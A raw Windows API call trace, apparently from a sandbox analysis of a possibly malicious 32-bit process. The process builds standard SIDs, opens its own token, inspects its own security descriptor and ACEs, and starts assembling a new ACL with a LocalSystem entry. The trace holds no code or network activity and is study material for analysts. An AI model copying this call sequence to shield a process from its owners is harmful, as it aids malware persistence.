[0110.509] IsValidSid (pSid=0x2b6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x226f58) returned 0x0
[0110.509] LocalFree (hMem=0x226f40) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f6fc, pSourceSid=0x226f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2b6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0110.509] IsValidSid (pSid=0x2b6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x21c1c8) returned 0x0
[0110.509] LocalFree (hMem=0x226f58) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f770, pSourceSid=0x226f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2b6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0110.509] IsValidSid (pSid=0x2b6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0110.509] ConvertSidToStringSidA () returned 0x1
[0110.509] LocalFree (hMem=0x21c1c8) returned 0x0
[0110.509] LocalFree (hMem=0x226f70) returned 0x0
[0110.509] ConvertStringSidToSidA () returned 0x1
[0110.509] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f7f8, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2b6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0110.510] IsValidSid (pSid=0x2b6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0110.510] ConvertSidToStringSidA () returned 0x1
[0110.510] LocalFree (hMem=0x21c1c8) returned 0x0
[0110.510] LocalFree (hMem=0x226f40) returned 0x0
[0110.510] ConvertStringSidToSidA () returned 0x1
[0110.510] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f880, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2b6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0110.510] IsValidSid (pSid=0x2b6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0110.510] ConvertSidToStringSidA () returned 0x1
[0110.510] LocalFree (hMem=0x226f58) returned 0x0
[0110.510] LocalFree (hMem=0x226f40) returned 0x0
[0110.510] ConvertStringSidToSidA () returned 0x1
[0110.510] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f90c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2b6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0110.510] IsValidSid (pSid=0x2b6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0110.510] ConvertSidToStringSidA () returned 0x1
[0110.510] LocalFree (hMem=0x226f58) returned 0x0
[0110.510] LocalFree (hMem=0x226f40) returned 0x0
[0110.510] ConvertStringSidToSidA () returned 0x1
[0110.510] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6f998, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2b6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0110.510] IsValidSid (pSid=0x2b6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0110.510] ConvertSidToStringSidA () returned 0x1
[0110.510] LocalFree (hMem=0x226f58) returned 0x0
[0110.510] LocalFree (hMem=0x226f40) returned 0x0
[0110.510] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.510] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0110.510] GetCurrentThread () returned 0xfffffffe
[0110.510] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.511] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0110.511] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0xce84c | out: TokenHandle=0xce84c*=0x2a43756) returned 0
[0110.511] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.511] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0110.511] GetCurrentProcess () returned 0xffffffff
[0110.511] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.511] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0110.511] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2b6fa3c | out: TokenHandle=0x2b6fa3c*=0x1d0) returned 1
[0110.511] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.511] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0110.511] MapGenericMask (in: AccessMask=0xce6c4, GenericMapping=0xce6c8 | out: AccessMask=0xce6c4)
[0110.511] MapGenericMask (in: AccessMask=0xce7f8, GenericMapping=0xce7fc | out: AccessMask=0xce7f8)
[0110.512] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.512] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0110.512] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xce80c | out: TokenInformation=0x0, ReturnLength=0xce80c) returned 0
[0110.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.512] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0110.512] GetLastError () returned 0x7a
[0110.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.512] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0110.512] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x220780, TokenInformationLength=0x24, ReturnLength=0xce830 | out: TokenInformation=0x220780, ReturnLength=0xce830) returned 1
[0110.512] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fab0, pSourceSid=0x220788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.512] IsValidSid (pSid=0x2b6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.512] ConvertSidToStringSidA () returned 0x1
[0110.512] LocalFree (hMem=0x219e80) returned 0x0
[0110.512] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.512] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0110.513] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fb34, pSourceSid=0x2b6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2b6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.513] IsValidSid (pSid=0x2b6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.513] ConvertSidToStringSidA () returned 0x1
[0110.513] LocalFree (hMem=0x219e80) returned 0x0
[0110.513] IsValidSid (pSid=0x2b6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0110.513] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.513] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0110.513] CloseHandle (hObject=0x1d0) returned 1
[0110.513] ConvertStringSidToSidA () returned 0x1
[0110.513] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fa54, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2b6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0110.513] IsValidSid (pSid=0x2b6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0110.513] ConvertSidToStringSidA () returned 0x1
[0110.513] LocalFree (hMem=0x226f58) returned 0x0
[0110.513] LocalFree (hMem=0x226f40) returned 0x0
[0110.513] ConvertStringSidToSidA () returned 0x1
[0110.513] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fae0, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2b6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0110.513] IsValidSid (pSid=0x2b6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0110.513] ConvertSidToStringSidA () returned 0x1
[0110.513] LocalFree (hMem=0x226f58) returned 0x0
[0110.513] LocalFree (hMem=0x226f40) returned 0x0
[0110.513] ConvertStringSidToSidA () returned 0x1
[0110.513] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fbfc, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2b6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0110.513] IsValidSid (pSid=0x2b6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0110.513] ConvertSidToStringSidA () returned 0x1
[0110.513] LocalFree (hMem=0x226f58) returned 0x0
[0110.513] LocalFree (hMem=0x226f40) returned 0x0
[0110.513] ConvertStringSidToSidA () returned 0x1
[0110.513] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fc8c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2b6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0110.513] IsValidSid (pSid=0x2b6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0110.514] ConvertSidToStringSidA () returned 0x1
[0110.514] LocalFree (hMem=0x226f58) returned 0x0
[0110.514] LocalFree (hMem=0x226f40) returned 0x0
[0110.514] ConvertStringSidToSidA () returned 0x1
[0110.514] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fd1c, pSourceSid=0x226f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2b6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0110.514] IsValidSid (pSid=0x2b6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0110.514] ConvertSidToStringSidA () returned 0x1
[0110.514] LocalFree (hMem=0x226f58) returned 0x0
[0110.514] LocalFree (hMem=0x226f40) returned 0x0
[0110.514] GetCurrentProcessId () returned 0xfa4
[0110.514] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xfa4) returned 0x1d0
[0110.514] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.514] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0110.514] GetSecurityInfo () returned 0x0
[0110.517] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.517] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0110.517] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x220f28, pControl=0xce5d2, lpdwRevision=0xce5cc | out: pControl=0xce5d2, lpdwRevision=0xce5cc) returned 1
[0110.517] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.517] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0110.517] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x220f28, pOwner=0xce5c8, lpbOwnerDefaulted=0xce5bc | out: pOwner=0xce5c8*=0x0, lpbOwnerDefaulted=0xce5bc) returned 1
[0110.517] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.517] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0110.517] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x220f28, pGroup=0xce5c8, lpbGroupDefaulted=0xce5bc | out: pGroup=0xce5c8*=0x0, lpbGroupDefaulted=0xce5bc) returned 1
[0110.517] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.518] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0110.518] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x220f28, lpbDaclPresent=0xce5c0, pDacl=0xce5b4, lpbDaclDefaulted=0xce5bc | out: lpbDaclPresent=0xce5c0, pDacl=0xce5b4, lpbDaclDefaulted=0xce5bc) returned 1
[0110.518] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.518] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0110.518] IsValidAcl (pAcl=0x220f3c) returned 1
[0110.518] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.518] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0110.518] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x0, pAce=0xce454 | out: pAce=0xce454*=0x220f44) returned 1
[0110.518] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6fe74, pSourceSid=0x220f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.518] IsValidSid (pSid=0x2b6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0110.518] ConvertSidToStringSidA () returned 0x1
[0110.518] LocalFree (hMem=0x227018) returned 0x0
[0110.518] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x1, pAce=0xce454 | out: pAce=0xce454*=0x220f5c) returned 1
[0110.518] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b6ff60, pSourceSid=0x220f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.518] IsValidSid (pSid=0x2b6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.518] ConvertSidToStringSidA () returned 0x1
[0110.518] LocalFree (hMem=0x227018) returned 0x0
[0110.518] GetAce (in: pAcl=0x220f3c, dwAceIndex=0x2, pAce=0xce454 | out: pAce=0xce454*=0x220f70) returned 1
[0110.518] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b629c0, pSourceSid=0x220f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2b629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0110.518] IsValidSid (pSid=0x2b629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0110.518] ConvertSidToStringSidA () returned 0x1
[0110.518] LocalFree (hMem=0x227018) returned 0x0
[0110.519] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.519] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0110.519] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x220f28, lpbSaclPresent=0xce5c4, pSacl=0xce5b8, lpbSaclDefaulted=0xce5bc | out: lpbSaclPresent=0xce5c4, pSacl=0xce5b8, lpbSaclDefaulted=0xce5bc) returned 1
[0110.519] LocalFree (hMem=0x220f28) returned 0x0
[0110.519] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.519] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.519] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0110.519] GetLengthSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.519] GetLastError () returned 0x0
[0110.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.519] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0110.519] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.520] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0110.520] InitializeAcl (in: pAcl=0x227fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x227fa8) returned 1
[0110.520] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.520] GetLengthSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.520] GetLastError () returned 0x0
[0110.520] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.520] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0110.520] SetLastError (dwErrCode=0x0)
[0110.520] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.520] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0110.520] GetSidSubAuthorityCount (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b6f615
[0110.520] GetLastError () returned 0x0
[0110.520] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.520] SetLastError (dwErrCode=0x0)
[0110.520] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.520] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0110.521] GetSidIdentifierAuthority (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b6f616
[0110.521] GetLastError () returned 0x0
[0110.521] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.521] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.521] SetLastError (dwErrCode=0x0)
[0110.521] GetSidSubAuthorityCount (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2b6f615
[0110.521] GetLastError () returned 0x0
[0110.521] SetLastError (dwErrCode=0x0)
[0110.521] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.521] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0110.521] GetSidSubAuthority (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2b6f61c
[0110.521] GetLastError () returned 0x0
[0110.521] IsValidSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0110.521] GetLengthSid (pSid=0x2b6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0110.521] GetLastError () returned 0x0
[0110.521] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0110.521] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0110.521] AddAce (in: pAcl=0x227fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x212f90, nAceListLength=0x14 | out: pAcl=0x227fa8) returned 1
[0110.521] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0110.522] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0110.522] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
